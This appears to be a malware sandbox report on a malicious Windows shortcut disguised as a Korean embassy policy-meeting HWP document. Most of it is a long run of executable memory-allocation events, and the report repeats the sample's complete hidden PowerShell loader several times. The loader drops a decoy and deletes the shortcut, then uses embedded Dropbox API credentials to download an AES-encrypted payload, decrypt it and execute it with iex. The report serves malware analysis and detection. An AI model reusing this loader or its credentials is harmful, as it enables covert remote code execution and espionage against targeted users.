NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:23 p.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file	C:\Users\test22\AppData\Roaming\HNC\Office\Recent\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp.lnk

Creates a shortcut to an executable file (4 events)

file	C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file	C:\Users\test22\AppData\Roaming\HNC\Office\Recent\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp.lnk
file	C:\Users\test22\AppData\Local\Temp\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

cmdline

powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 21, 2024, 2:23 p.m.	thread_identifier: 2664 thread_handle: 0x00000334 process_identifier: 2660 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000033c	1	1	0
CreateProcessInternalW Aug. 21, 2024, 2:23 p.m.	thread_identifier: 2768 thread_handle: 0x00000084 process_identifier: 2764 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object 